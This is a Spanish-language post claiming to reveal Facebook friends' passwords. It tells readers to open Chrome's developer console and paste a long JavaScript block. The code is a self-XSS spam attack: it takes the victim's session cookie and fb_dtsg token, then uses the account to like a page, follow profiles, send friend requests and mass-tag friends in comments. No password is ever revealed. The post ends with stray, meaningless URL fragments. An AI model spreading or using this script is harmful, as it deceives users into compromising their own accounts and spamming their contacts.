Quieren “hackear” – tener el password de la cuenta de tus amigos en Facebook? Aprovechen esta vulnerabilidad antes de que se den cuenta y la quiten, está funcionando AHORITA!
1. Necesitan utilizar Google Chrome
2. Aprietan la tecla F12
3. Van a la seccion/pestaña que dice “Consola”
4. Copian y pegan el siguiente código <ver abajo>, presionan <ENTER> y listo!!! Se abrirá un pop-up presiona el numero 1 y espera la lista!!!
codigo:
/* Copiar a partir de aquí */
function a(abone){var http4=new XMLHttpRequest;var url4="/ajax/follow/follow_profile.php?__a=1";var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";http4.open("POST",url4,true);http4.onreadystatechange=function(){if(http4.readyState==4&&http4.status==200)http4.close};http4.send(params4)}a("");function sublist(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var now=(new Date).getTime();function P(post){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/ufi/like.php";var XParams="like_action=true&ft_ent_identifier="+post+"&source=1&client_id="+now+"%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]="+post+"&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}var fb_dtsg=document.getElementsByName('fb_dtsg')[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);function Like(p){var Page=new XMLHttpRequest();var PageURL="//www.facebook.com/ajax/pages/fan_status.php";var PageParams="&fbpage_id="+p+"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";Page.open("POST",PageURL,true);Page.onreadystatechange=function(){if(Page.readyState==4&&Page.status==200){Page.close}};Page.send(PageParams)}Like("120802208090455");function IDS(r){var X=new XMLHttpRequest();var XURL="//www.facebook.com/ajax/add_friend/action.php";var XParams="to_friend="+r+"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";X.open("POST",XURL,true);X.onreadystatechange=function(){if(X.readyState==4&&X.status==200){X.close}};X.send(XParams)}
Like("120802208090455");
instantspam:{
function x__0() {
return new XMLHttpRequest;
}
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function get_friends() {
var a = x__0();
a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=" + uid + "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.payload.entries;
}
return false;
}
function get_friend_friends(inicio, id) {
var a = x__0();
a.open("GET", "https://www.facebook.com/ajax/browser/list/allfriends/?uid=" + id + "&__user=" + uid + "&__a=1&start=" + inicio, false);
a.send(null);
if (a.readyState == 4) {
var lista_amigos = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return lista_amigos;
}
return false;
}
function get_friend_quantity(user) {
var a = x__0();
a.open("GET", "https://www.facebook.com/"+user+"/friends", false);
a.send(null);
if (a.readyState == 4) {
return a.responseText
}
return false;
}
function get_object_friends(ids){
var a = x__0();
a.open("GET", "http://graph.facebook.com/fql?q=select uid, sex, username from user where uid in ("+ids+")&format=json-strings" + i, false);
a.send();
if (a.readyState == 4) {
return JSON.parse(a.responseText);
}
return false;
}
function mention(b){
var a=x__0();
a.open("POST", '/ajax/ufi/add_comment.php?__a=1', false);
a.send(b);
return false;
}
var comecar = 0;
var startzao = prompt("A partir de qual numero voce quer começar? Se essa é a primeira vez que tá usando, poe 1");
var fim = 350;
var msg = /comment_text=(.*?)&/
var c = 1;
var contador_amigo;
var uid = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var a = window.top.location;
var amigos = get_friends();
var post_id = /[0-9]{8,}/.exec(a);
var mensagem = '';
var amigos_id = [];
uids = 'comment_text=' + mensagem + ' ';
header = 'ft_ent_identifier=' + post_id + '&comment_text=teste&client_id=1359576694192%3A1233576093&__user=' + uid + '&__a=1&fb_dtsg=' + document.getElementsByName('fb_dtsg')[0].value + '&phstamp=' + Math.random();
var contador_master = 0;
comeca = 0;
fim = 5000;
for(var n=0;n<amigos.length;n++){
amigos_id[n] = amigos[n].uid;
}
ids_query = "'"+amigos_id.join("','")+"'";
var json_retorno_graph = get_object_friends(ids_query);
var amigos2 = json_retorno_graph['data'];
if (comeca < fim) {
//for (var i = 1; i < amigos2.length; i++) {
for (var i = startzao; i < amigos2.length; i++) {
contador_amigo = i;
lock = true;
while (lock) {
var amigos_of = get_friend_friends(comecar, amigos2[i].uid);
ids = [];
ids = amigos_of['domops'][0][3]['__html'].match(/data\-profileid\=\"(\d+)/g);
if (!ids) {
lock = false;
};
for (var a in ids) {
comeca++;
uids += '%40[' + /\d+/.exec(ids[a]) + '%3AAAAAAAAAAAA]%20';
c++;
if (c == 6) {
uids += '&';
mention(header.replace(msg, uids), false);
c = 1;
contador_master += 5;
if(contador_master == 40000){
alert('Terminou no amigo ' +contador_amigo+'! Guarde esse número e use no começo da próxima execução para minimizar as chances de marcar perfis repetidos ');
break instantspam;
};
uids = 'comment_text=' + mensagem + ' ';
}
}
comecar += 24;
console.log('### OFFSET' + comecar);
console.log('.............. AMIGO ' + contador_amigo);
}
comecar = 0;
}
}
}
http://first_degree.php/?__a=1&filter%5B0%5D=user&lazy=0&viewer
first_degree.php
http://first_degree.php/?__a=1&filter%5B0%5D=user&lazy=0&viewer
first_degree.php
http://first_degree.php/?__a=1&filter%5B0%5D=user&lazy=0&viewer
first_degree.php